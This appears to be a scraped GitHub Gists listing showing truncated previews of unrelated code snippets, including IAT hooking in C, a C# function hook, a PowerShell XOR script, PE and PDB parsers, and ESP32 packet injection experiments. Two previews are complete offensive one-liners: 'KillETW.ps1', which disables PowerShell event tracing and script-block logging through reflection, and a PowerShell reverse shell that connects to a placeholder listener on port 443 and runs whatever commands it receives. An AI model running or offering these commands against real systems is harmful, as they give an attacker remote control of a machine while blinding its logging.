c0d3inj3cT
/ iat.c
Created
November 20, 2013 06:01
This code can be used for hooking the IAT. In this particular example, I overwrite the function pointer of Sleep() imported from Kernel32.dll in the IAT of the main executable image. Sleep function is called two times in the code, both before and after hooking the IAT to confirm that it was hooked successfully.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| This code will hook the IAT by overwriting the function pointer of Sleep() imported from Kernel32.dll | |
| It can be modified to hook any other function in the IAT | |
| */ | |
| #include <stdio.h> | |
| #include <windows.h> | |
| void spoofedfunction(DWORD); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| public class FxHook:IDisposable { | |
| const int nBytes = 5; | |
| IntPtr addr; | |
| Protection old; | |
| byte[] src = new byte[5]; |
gabemarshall
/ xor.ps1
Last active
November 1, 2023 11:17
Simple Encrypt and Decrypt with Powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Not secure by any means, just a PoC for XOR'ing data using powershell | |
| # Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption | |
| $enc = [System.Text.Encoding]::UTF8 | |
| function xor { | |
| param($string, $method) | |
| $xorkey = $enc.GetBytes("secretkey") | |
| if ($method -eq "decrypt"){ |
augustoproiete
/ ReadingPortableExecutable_PE_header.cs
Created
December 6, 2016 04:03
Reading the Portable Executable (PE) header in C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Credits: John Stewien | |
| // From: http://code.cheesydesign.com/?p=572 | |
| /* | |
| Reading the Portable Executable (PE) header in C# | |
| My job consists of writing fully custom applications for groups of people. The time pressure of these projects is quite high, so generally people start using the application while I’m still writing it, which means I write it modularly and add features as I go along. I also fix bugs as they are discovered. My clients are 2 tiered where expert users get a new build first, they test if for a while, and if they think it’s acceptable they then pass it on to others. | |
| This method of distribution is quite ad-hoc so when a client rings me up and asks me to view their screen to look at something, it’s useful to know what build they are running. To facillitate this I print the link date in the main Window Title so I instantly have an idea about how old the version is that I am looking at. This date is calculated at run time. To do this requires reading in the Portable Executable (PE) header from th |
brainstorm
/ esp32_promisc.c
Last active
June 16, 2024 14:47
esp32 promiscuous mode and packet injection experiments
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Espressif ESP32 promiscuous mode and packet injection experiments | |
| // by brainstorm at nopcode org | |
| #include "freertos/FreeRTOS.h" | |
| #include "esp_wifi.h" | |
| #include "esp_wifi_internal.h" | |
| #include "lwip/err.h" | |
| #include "esp_system.h" | |
| #include "esp_event.h" | |
| #include "esp_event_loop.h" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var net = require('net') | |
| var readline = require('readline') | |
| /** | |
| * @class Client | |
| * @param host {String} the host | |
| * @param post {Integer} the port | |
| */ | |
| function Client (host, port) { | |
| this.host = host |
tandasat
/ KillETW.ps1
Last active
November 12, 2024 13:31
Disable ETW of the current PowerShell session
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
namazso
/ pdb_parser_lite.cpp
Created
April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* MIT License | |
| * | |
| * Copyright (c) namazso 2018 | |
| * | |
| * Permission is hereby granted, free of charge, to any person obtaining a copy | |
| * of this software and associated documentation files (the "Software"), to deal | |
| * in the Software without restriction, including without limitation the rights | |
| * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| * copies of the Software, and to permit persons to whom the Software is | |
| * furnished to do so, subject to the following conditions: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; |
OlderNewer